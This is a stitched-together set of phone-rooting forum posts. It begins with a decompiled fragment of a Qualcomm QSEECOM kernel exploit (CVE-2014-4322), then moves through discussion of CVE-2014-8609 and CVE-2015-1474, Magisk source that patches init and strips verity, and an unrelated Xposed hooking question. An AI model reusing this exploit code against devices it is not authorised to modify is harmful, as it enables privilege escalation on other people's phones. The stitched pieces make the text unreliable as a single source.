while ( 1 )
{
while ( 1 )
{
v93 = *(int *)v85;
v94 = v86;
v95 = v87;
v96 = *(int *)&v88;
v97 = v89;
v98 = v90;
v99 = v91;
v100 = v92;
v22 = ioctl(qseecom_fd, QSEECOM_IOCTL_APP_LOADED_QUERY_REQ, &v93);
if ( v22 )
{
v27 = (int *)_errno(v22, v23, v24);
strerror(*v27);
sub_89F4();
goto obtain_qseecom_mem;
}
sub_89F4();
puts("query failed. trying another app...");
if ( strcmp(v85, "tzwidevine") )
break;
strcpy(v85, "keymaster");
}
if ( strcmp(v85, "keymaster") )
break;
strcpy(v85, "tzsuntory");
}
if ( !strcmp(v85, "tzsuntory") )
{
puts("Error querying app");
goto getting_root;
}
obtain_qseecom_mem:
v64 = v63;
v65 = v20;
v66 = 2113929216;
v28 = ioctl(qseecom_fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &v64);
v31 = v28;
if ( v28 )
{
v57 = (int *)_errno(v28, v29, v30);
v58 = strerror(*v57);
printf("Error ioctl QSEECOM_IOCTL_SET_MEM_PARAM_REQ: %d / %s\n", v31, v58);
}
else
{
sub_89F4();
}
munmap(v20, 2113929216);
v32 = mmap(v20, 4096, 7, 50);
if ( v32 == -1 )
puts("Error allocating shared buf again");
memset((void *)v32, 255, 0x1000u);
v77 = 0;
v79 = 0;
v78 = 0;
v81 = 0;
v80 = 0;
v83 = 0;
v82 = 0;
v73 = 2113921024;
v74 = v32 + 80;
v75 = 4096;
v76 = v63;
v72 = v32;
puts("getting ptr");
v33 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v33 )
{
v36 = (int *)_errno(v33, v34, v35);
strerror(*v36);
sub_89F4();
}
else
{
sub_89F4();
}
munmap(v32, 4096);
sub_89F4();
v37 = mmap(v20, 524288, 7, 49);
if ( v37 != -1 )
{
sub_89F4();
memset((void *)v37, 255, 0x80000u);
v72 = v32 + ((unsigned int)(v37 + 979369984) >> 1);
v77 = (unsigned int)(v37 + 979369984) >> 1;
puts("getting offset");
v38 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v38 )
{
v41 = (int *)_errno(v38, v39, v40);
strerror(*v41);
sub_89F4();
}
else
{
sub_89F4();
}
v42 = sub_8A00(v37, 524288);
munmap(v37, 524288);
v43 = mmap(*(int *)ion_void, 1024, 7, 49);
if ( v43 == -1 )
{
puts("Error: Could not allocate memory for exploit code");
}
else
{
v44 = (void *)v43;
sub_89F4();
memcpy(v44, sub_8994, 0x400u);
munmap(ion_void, 4096);
v45 = (int)((char *)v44 + 64);
do
{
while ( 1 )
{
v46 = *(int *)v44;
v44 = (char *)v44 + 4;
if ( v46 == -1091584273 )
break;
if ( v44 == (void *)v45 )
goto exploit_qseecom;
}
*((int *)v44 - 1) = sub_89A4;
}
while ( v44 != (void *)v45 );
exploit_qseecom:
v47 = v32 + ((unsigned int)(v37 + *(int *)(*(int *)v11 + 8) + 979370040 - v42) >> 1);
v77 = (unsigned int)(v37 + *(int *)(*(int *)v11 + 8) + 979370040 - v42) >> 1;
v72 = v47;
puts("exploiting");
v48 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v48 )
{
v51 = (int *)_errno(v48, v49, v50);
strerror(*v51);
sub_89F4();
}
else
{
sub_89F4();
}
}
goto getting_root;
}
puts("Error allocating testmem");
result = 1;
error:
if ( v102 != _stack_chk_guard )
_stack_chk_fail(result);
return result;
}
I am tried to construct but sorry I am not skilled in reverse enginering. If you understand than try to construct right function from that and share it here!
Click to expand...
Click to collapse
Making CVE-2014-4322 a universal one would be quite challenging since it provides write-anywhere without read. It is almost impossible to avoid hard coded offsets. It would be great if there is another read and write anywhere flaw which requires system priv.
ZPaul2Fresh8 said:
I understand, but what are the possible Broadcasts at our disposal? Whatever broadcast we send will be of System UID so maybe we can find something if we look hard enough?
I have Liang Chen (Team Keen (http://en.wikipedia.org/wiki/Pwn2Own#Contest_2014)) looking into CVE-2014-8609 to see if we can achieve System UID.
Click to expand...
Click to collapse
Okay I decided to try to invoke the android terminal intent to open a new terminal window as a system user. it doesn't work for me but other people on preOTA may be able to get it to work. I disabled the factory reset crap so don't worry about accidently factory resetting your device (like I did to my tablet before I disabled them). You will need to install the android terminal emulator app from the play store prior to opening this app and clicking the button. if you get a terminal window open type whoami and post a screenshot please. If not a simple post saying it doesn't work is fine.
Sent from my SAMSUNG-SM-N910A using Tapatalk
This one looking good https://android.googlesource.com/pl...5d3e74ecc2b973941d8adbe40c6b23094b5abb7^!/#F0
You can decompile settings.apk and search in src/com/android/settings/accounts/AddAccountSettings.smali to see if it is patched or not.
Hey I know it's already been stated but I wanted to confirm for myself. Confirmed... The string "checkAndGetTcObjectClass" exists in system.img.ext4 from NI1 that i pulled off of sammobile.com http://www.sammobile.com/firmwares/download/38838/N910VVRU1ANI1_N910VVZW1ANI1_VZW.zip/. Screenshot below.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
Hi, I have implemented terminal emulator internaly into CVE-2014-8609.apk but from some unknown reasons it fail to start when I press "open terminal" button, I have spent 2 hours with this and I am lazy to debug more, sorry, try to decompile mine apk and fix it! Interesting thing I can start internal terminal emulator by command: "am start -n com.example.android.samplesync/jackpal.androidterm.Term", but clicking on button it no want to start
munjeni said:
I don't know, I stil receiving sms, only unable to get terminal emulator on button click
Click to expand...
Click to collapse
I don't understand it. I'm passing the intent the same way the sms intent and format interested t is passed back to the pending intent. It's just not working. I'm trying to make a service to hand it off to withing the app so that once it's intent is hit I can keep it alive in the background service, and then pull it back into the foreground to use it. In theory this should work even though the originating pending intent is killed shortly after the button press.
Sent from my SAMSUNG-SM-N910A using Tapatalk
stvn1337 said:
I don't understand it. I'm passing the intent the same way the sms intent and format interested t is passed back to the pending intent. It's just not working. I'm trying to make a service to hand it off to withing the app so that once it's intent is hit I can keep it alive in the background service, and then pull it back into the foreground to use it. In theory this should work even though the originating pending intent is killed shortly after the button press.
Sent from my SAMSUNG-SM-N910A using Tapatalk
Click to expand...
Click to collapse
Yes strange, when I click on "open terminal" it open settings, another clicks doing nothing until I kill app and lunch again, strange. Maybe we need to look into terminal emulator for this? I have no time now, but you can try to open another app?
It open com.google.android.c2dm.intent sucesfully but no terminal emulator, I don't know why.
munjeni said:
Yes strange, when I click on "open terminal" it open settings, another clicks doing nothing until I kill app and lunch again, strange. Maybe we need to look into terminal emulator for this? I have no time now, but you can try to open another app?
It open com.google.android.c2dm.intent sucesfully but no terminal emulator, I don't know why.
Click to expand...
Click to collapse
Your correct, I wonder if terminal emulator has been patched to prevent the broadAnywhere bug from launching it? If so then we need to find another terminal emulator that allows broadAnywhere to launch it with intents. Unless someone has time to search the terminal emulators source to figure out how it's been patched to prevent it..
Sent from my SAMSUNG-SM-N910A using Tapatalk
Maxninja said:
I did some research and googled the CVE-2014-4322 exploit and I stumbled on a forum for the Sony Xperia for them to achieve root with that exploit - http://forum.xda-developers.com/showthread.php?t=3011598
I don't know if it's useful but I hope it will help somewhere in the process for our phone to be rooted with the same exploit.
Click to expand...
Click to collapse
Yeah that was covered 50+ pages ago. That's the kernel side of it, we know that will work but first we have to get through the Android side first. That's what 1474 should do for us.
@soupmeister Yes. This is the best place.
windstrings said:
This brings the next question.. An educated guess as to whether this will work with lollipop?
Click to expand...
Click to collapse
I would be curious about this also, but only after root is out for pre-Lollipop. The description says through 5.0, which sounds to me like 5.0 is vulnerable but who knows if 5.0.1 or 5.0.2 is. Also Samsung, as we've seen recently with the root that works on other phones using those two CVEs not working on our phones, will backport fixes. I don't know how much Samsung is still tweaking their Lollipop update, but since this seems like a small fix, my money would be on it being fixed in the Samsung Lollipop update.
Btw I've been trying to upload the contents of system.img.ext4 from the AT&T and Verizon tar md5 files to Google Drive for easy reference but it keeps timing out and I don't want to post something missing random files. I'll try with a specialized uploader tool later.
Also CVE-2015-1474 was updated on the 17th to say that it's network exploitable(!) and I guess they gave it a 10.0 score, the highest! This seems to be more serious than that last "worst android bug ever" recently used for root in the last year.
I sure hope whatever tool that gives root that comes out also applies a fix for this. I wouldn't want to walk around with it if I could help it.
So after a bunch of useless posts basically asking to confirm this or thanking that..at least we can count on qcom to brighten our day...
https://www.codeaurora.org/projects...le-camera-drivers-cve-2014-4321-cve-2014-4324
Qcom camera FTW
Just a little further reading for some:
http://www.cvedetails.com/cve/CVE-2015-1474/
jcase said:
Would still require 1 or 2 additional vulns to exploit. Not so easy to get camera group in modern Android
Click to expand...
Click to collapse
Correct me if I am wrong but camera group should actually be rather easy to take advantage of especially in modern Android. In June this last year the play store rolled out an update that groups all applications for security permissions, so in theory, any app in this group can be used to exploit the vulnerability found. Which means all apps that take picture or record audio are on the table as they are all lumped in together with the camera group.
Basic example of what apps like this can do now that they are grouped.
Camera/Microphone: An app that has permission to take pictures and videos (for example, a camera app) can now gain the permission to record audio. The app could listen to you when you use other apps or when your device’s screen is off.
If this is true than someone much smarter than me should have a lot to fool around with.
jasonstackhouse said:
Correct me if I am wrong but camera group should actually be rather easy to take advantage of especially in modern Android. In June this last year the play store rolled out an update that groups all applications for security permissions, so in theory, any app in this group can be used to exploit the vulnerability found. Which means all apps that take picture or record audio are on the table as they are all lumped in together with the camera group.
Basic example of what apps like this can do now that they are grouped.
Camera/Microphone: An app that has permission to take pictures and videos (for example, a camera app) can now gain the permission to record audio. The app could listen to you when you use other apps or when your device’s screen is off.
If this is true than someone much smarter than me should have a lot to fool around with.
Click to expand...
Click to collapse
Ok I will. These "permission groups" from the play store have nothing to do with this. We are talking about a single android permission (android.permission.CAMERA) and a single linux group ("camera').
In 5.0, and many 4.x devices (i dont think it was all, it might have been all, i just dont care to find my notes, 10hr trip to take son to Dr and back, just got home and freaking tired) the linux group "camera" used in android was severed from the camera permission, declaring this permission does not put your user (app) into the camera group.
Simple test,
adb shell grep -A 10 -B 10 camera /system/etc/permissions/platform.xml
On blackphone (4.4.x), HTC Desire 510 (4.4.x) MotoX 2014 (5.0.x), the above command returned nothing.
One older devices, say 4.2.2 you would get teh following as the output:
<permission name="android.permission.CAMERA" >
<group gid="camera" />
</permission>
This means apps that are granded the permission, are put into the group "camera".
See:
https://android.googlesource.com/platform/frameworks/base/+/android-4.2.2_r1/data/etc/platform.xml
vs
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.2_r1/data/etc/platform.xml
What does this mean? You cant directly talk to what you need to to exploit those camera vulns, you would need to exploit mediaserver, or escalate to system first (Which means squat, if you are system you have 100 ways to root that are easier than these camera bugs). Also must not forget about SEAndroid, might put a snag into it as well, but like ive said I just saw these today, and have been home for a whole 10minutes so far today.
Misterxtc said:
If it helps any this is what the adb command returned on the VZW Note4 on NJ5.
View attachment 3172812
Click to expand...
Click to collapse
Same here, AT&T NIE
C:\Users\rac1\Desktop\ADB>adb shell grep -A 10 -B 10 camera /system/etc/permissi
ons/platform.xml
<permission name="android.permission.SYSTEM_GROUP_INTERNAL" >
<group gid="system" />
</permission>
<permission name="android.permission.INTERNET" >
<group gid="inet" />
</permission>
<permission name="com.sec.android.permission.CAMERA" >
<group gid="camera" />
</permission>
<permission name="android.permission.READ_LOGS" >
<group gid="log" />
</permission>
<permission name="android.permission.READ_EXTERNAL_STORAGE" >
<group gid="sdcard_r" />
</permission>
--
<group gid="graphics" />
</permission>
<!-- Except for SysScope, DO NOT USE this permission. -->
<permission name="com.sec.android.app.sysscope.permission.ACCESS_SYSTEM_INFO
_SYSSCOPE_ONLY" >
<group gid="radio" />
</permission>
<!-- Group that can use gscaler -->
<permission name="com.sec.android.permission.USE_CAMERA" >
<group gid="camera" />
</permission>
<!-- ================================================================== -->
<!-- ================================================================== -->
<!-- ================================================================== -->
<!-- The following tags are assigning high-level permissions to specific
user IDs. These are used to allow specific core system users to
perform the given operations with the higher-level framework. For
example, we give a wide variety of permissions to the shell user
OK let's not forget about cve-2015-1474. This is the vulnerability that's going to get us what we want. Let's not get sidetracked about another vulnerability that we may not even need.
hello every body
i hope all of you have a good health and good life...sorry if my english is rubbish
my question is that magisk v23 deosn't flash my phone in right way it working prefectly on v24+ but i just not comfortable with magisk hide removed and zygisk and more things i found that commit https://github.com/topjohnwu/Magisk/pull/5139/commits/3ecae6300632b29e4920270e6a8ff0bdd70164b6 solved the problem with fstab iam not a developer iam just a user but i could help my self to understand by guides
so is there a way to change or to apply this changes in commit to v23 and flash my phone with it ...and if so i would really apperciate a quick gide to help me to do so...
thanks in advance
i hope you all have a good day
eslam.essa.2011 said:
hello every body
i hope all of you have a good health and good life...sorry if my english is rubbish
my question is that magisk v23 deosn't flash my phone in right way it working prefectly on v24+ but i just not comfortable with magisk hide removed and zygisk and more things i found that commit https://github.com/topjohnwu/Magisk/pull/5139/commits/3ecae6300632b29e4920270e6a8ff0bdd70164b6 solved the problem with fstab iam not a developer iam just a user but i could help my self to understand by guides
so is there a way to change or to apply this changes in commit to v23 and flash my phone with it ...and if so i would really apperciate a quick gide to help me to do so...
thanks in advance
i hope you all have a good day
Click to expand...
Click to collapse
Here, try this 3rd party version of Magisk 25.2 Delta. It has Magiskhide and no need to turn on Zygisk. You probably will have to patch your boot.img though. There is info on how to move to this version of Magisk... If you want LSPosed, first download Riru v26.1.6 , install that and reboot, then get LSPosedd riru 1.8.3, install and reboot. You can hide all banking apps and most that don't work with zygisk turned on. There is a good explanation of how Zygisk can be detected by a lot of apps. Hope this helps.
bobfrantic said:
Here, try this 3rd party version of Magisk 25.2 Delta. It has Magiskhide and no need to turn on Zygisk. You probably will have to patch your boot.img though. There is info on how to move to this version of Magisk... If you want LSPosed, first download Riru v26.1.6 , install that and reboot, then get LSPosedd riru 1.8.3, install and reboot. You can hide all banking apps and most that don't work with zygisk turned on. There is a good explanation of how Zygisk can be detected by a lot of apps. Hope this helps.
Click to expand...
Click to collapse
lots of bugs my friend sorry iam late for reading your reply+test it
iam need to build magisk from source after editing this file from v23.0 https://github.com/topjohnwu/Magisk/blob/v23.0/native/jni/init/twostage.cpp to be similar and function to this file from v24.2 https://github.com/topjohnwu/Magisk/blob/v24.2/native/jni/init/twostage.cpp but i got errors when start to build binaries any help from here ?
eslam.essa.2011 said:
lots of bugs my friend sorry iam late for reading your reply+test it
iam need to build magisk from source after editing this file from v23.0 https://github.com/topjohnwu/Magisk/blob/v23.0/native/jni/init/twostage.cpp to be similar and function to this file from v24.2 https://github.com/topjohnwu/Magisk/blob/v24.2/native/jni/init/twostage.cpp but i got errors when start to build binaries any help from here ?
Click to expand...
Click to collapse
sorry can't assist you with editing the file...
bobfrantic said:
sorry can't assist you with editing the file...
Click to expand...
Click to collapse
its ok my friend thanks for trying to help anyway
if you would please....if you know someone here who can please mention him/her here
hope you have a good day
@Didgeridoohan any help here brother if you may accept this
my problem is that i edited v23.0 twostage.cpp to be similar to this commit https://github.com/topjohnwu/Magisk/pull/5139/commits/3ecae6300632b29e4920270e6a8ff0bdd70164b6 wich solve bootloop for samsung a528b/a52s 5g but after build then flash the stock AP file with my new build magisk it still get bootloop what i did wrong i attached twostage.cpp after editing and many thanks to all of xda users who would help me and who wouldn't
Code:
#include <sys/mount.h>
#include <magisk.hpp>
#include <utils.hpp>
#include <socket.hpp>
#include "init.hpp"
using namespace std;
void fstab_entry::to_file(FILE *fp) {
fprintf(fp, "%s %s %s %s %s\n", dev.data(), mnt_point.data(),
type.data(), mnt_flags.data(), fsmgr_flags.data());
}
#define set_info(val) \
line[val##1] = '\0'; \
entry.val = &line[val##0];
#define FSR "/first_stage_ramdisk"
extern uint32_t patch_verity(void *buf, uint32_t size);
void FirstStageInit::prepare() {
if (cmd->force_normal_boot) {
xmkdirs(FSR "/system/bin", 0755);
rename("/init" /* magiskinit */, FSR "/system/bin/init");
symlink("/system/bin/init", FSR "/init");
rename("/.backup/init", "/init");
rename("/.backup", FSR "/.backup");
rename("/overlay.d", FSR "/overlay.d");
chdir(FSR);
} else {
xmkdir("/system", 0755);
xmkdir("/system/bin", 0755);
rename("/init" /* magiskinit */ , "/system/bin/init");
rename("/.backup/init", "/init");
}
char fstab_file[128];
fstab_file[0] = '\0';
// Find existing fstab file
for (const char *suffix : { cmd->fstab_suffix, cmd->hardware, cmd->hardware_plat }) {
if (suffix[0] == '\0')
continue;
for (const char *prefix: { "odm/etc/fstab", "vendor/etc/fstab", "fstab" }) {
sprintf(fstab_file, "%s.%s", prefix, suffix);
if (access(fstab_file, F_OK) != 0) {
fstab_file[0] = '\0';
} else {
LOGD("Found fstab file: %s\n", fstab_file);
goto exit_loop;
}
}
}
exit_loop:
// Try to load dt fstab
vector<fstab_entry> fstab;
read_dt_fstab(fstab);
if (!fstab.empty()) {
// Dump dt fstab to fstab file in rootfs and force init to use it instead
// All dt fstab entries should be first_stage_mount
for (auto &entry : fstab) {
if (!str_contains(entry.fsmgr_flags, "first_stage_mount")) {
if (!entry.fsmgr_flags.empty())
entry.fsmgr_flags += ',';
entry.fsmgr_flags += "first_stage_mount";
}
}
if (fstab_file[0] == '\0') {
const char *suffix =
cmd->fstab_suffix[0] ? cmd->fstab_suffix :
(cmd->hardware[0] ? cmd->hardware :
(cmd->hardware_plat[0] ? cmd->hardware_plat : nullptr));
if (suffix == nullptr) {
LOGE("Cannot determine fstab suffix!\n");
return;
}
sprintf(fstab_file, "fstab.%s", suffix);
}
// Patch init to force IsDtFstabCompatible() return false
auto init = mmap_data::rw("/init");
init.patch({ make_pair("android,fstab", "xxx") });
} else {
// Parse and load the fstab file
file_readline(fstab_file, [&](string_view l) -> bool {
if (l[0] == '#' || l.length() == 1)
return true;
char *line = (char *) l.data();
int dev0, dev1, mnt_point0, mnt_point1, type0, type1,
mnt_flags0, mnt_flags1, fsmgr_flags0, fsmgr_flags1;
sscanf(line, "%n%*s%n %n%*s%n %n%*s%n %n%*s%n %n%*s%n",
&dev0, &dev1, &mnt_point0, &mnt_point1, &type0, &type1,
&mnt_flags0, &mnt_flags1, &fsmgr_flags0, &fsmgr_flags1);
fstab_entry entry;
set_info(dev);
set_info(mnt_point);
set_info(type);
set_info(mnt_flags);
set_info(fsmgr_flags);
fstab.emplace_back(std::move(entry));
return true;
});
}
{
LOGD("Write fstab file: %s\n", fstab_file);
auto fp = xopen_file(fstab_file, "we");
for (auto &entry : fstab) {
// Redirect system mnt_point so init won't switch root in first stage init
if (entry.mnt_point == "/system")
entry.mnt_point = "/system_root";
// Force remove AVB for 2SI since it may bootloop some devices
auto len = patch_verity(entry.fsmgr_flags.data(), entry.fsmgr_flags.length());
entry.fsmgr_flags.resize(len);
entry.to_file(fp.get());
}
}
chmod(fstab_file, 0644);
chdir("/");
}
#define INIT_PATH "/system/bin/init"
#define REDIR_PATH "/system/bin/am"
void SARInit::first_stage_prep() {
xmount("tmpfs", "/dev", "tmpfs", 0, "mode=755");
// Patch init binary
int src = xopen("/init", O_RDONLY);
int dest = xopen("/dev/init", O_CREAT | O_WRONLY, 0);
{
auto init = mmap_data::ro("/init");
init.patch({ make_pair(INIT_PATH, REDIR_PATH) });
write(dest, init.buf, init.sz);
fclone_attr(src, dest);
close(dest);
}
// Replace redirect init with magiskinit
dest = xopen("/dev/magiskinit", O_CREAT | O_WRONLY, 0);
write(dest, self.buf, self.sz);
fclone_attr(src, dest);
close(src);
close(dest);
xmount("/dev/init", "/init", nullptr, MS_BIND, nullptr);
xmount("/dev/magiskinit", REDIR_PATH, nullptr, MS_BIND, nullptr);
xumount2("/dev", MNT_DETACH);
// Block SIGUSR1
sigset_t block, old;
sigemptyset(&block);
sigaddset(&block, SIGUSR1);
sigprocmask(SIG_BLOCK, &block, &old);
if (int child = xfork()) {
LOGD("init daemon [%d]\n", child);
// Wait for children signal
int sig;
sigwait(&block, &sig);
// Restore sigmask
sigprocmask(SIG_SETMASK, &old, nullptr);
} else {
// Establish socket for 2nd stage ack
struct sockaddr_un sun;
int sockfd = xsocket(AF_LOCAL, SOCK_STREAM | SOCK_CLOEXEC, 0);
xbind(sockfd, (struct sockaddr*) &sun, setup_sockaddr(&sun, INIT_SOCKET));
xlisten(sockfd, 1);
// Resume parent
kill(getppid(), SIGUSR1);
// Wait for second stage ack
int client = xaccept4(sockfd, nullptr, nullptr, SOCK_CLOEXEC);
// Write backup files
string tmp_dir = read_string(client);
chdir(tmp_dir.data());
int cfg = xopen(INTLROOT "/config", O_WRONLY | O_CREAT, 0);
xwrite(cfg, config.buf, config.sz);
close(cfg);
restore_folder(ROOTOVL, overlays);
// Ack and bail out!
write_int(client, 0);
close(client);
close(sockfd);
exit(0);
}
}
Hi all,
Looking for some help.
I am replacing the method setClickable(Z) in QSTileView, which extends the LinearLayout class. I need to first call the setClickable(Z) method from within LinearLayout (superclass) (please see source code below).
I'm hooking the method in QSTileView fine no problem, i'm just having issues getting back the LinearLayout to then call it from that class also.
View attachment 5908575
Any idea on how I can get this done?
There is no standard way to do that. However there's a dirty solution:
Java:
try {
Object object = /* QSTileView Object */
Class<?> superClass = android.view.View.class; // There's no setClickable() method in LinearLayout, it's in View
String methodName = "setClickable";
MethodType methodType = MethodType.methodType(void.class, boolean.class); // return type and param type
Field IMPL_LOOKUP = MethodHandles.Lookup.class.getDeclaredField("IMPL_LOOKUP");
IMPL_LOOKUP.setAccessible(true);
MethodHandles.Lookup lookup = (MethodHandles.Lookup) IMPL_LOOKUP.get(null);
MethodHandle handle = lookup.findSpecial(superClass, methodName, methodType, superClass);
handle.invoke(object, true); // calling super.setClickable(true)
} catch (Throwable t) {
System.out.println(t.toString());
}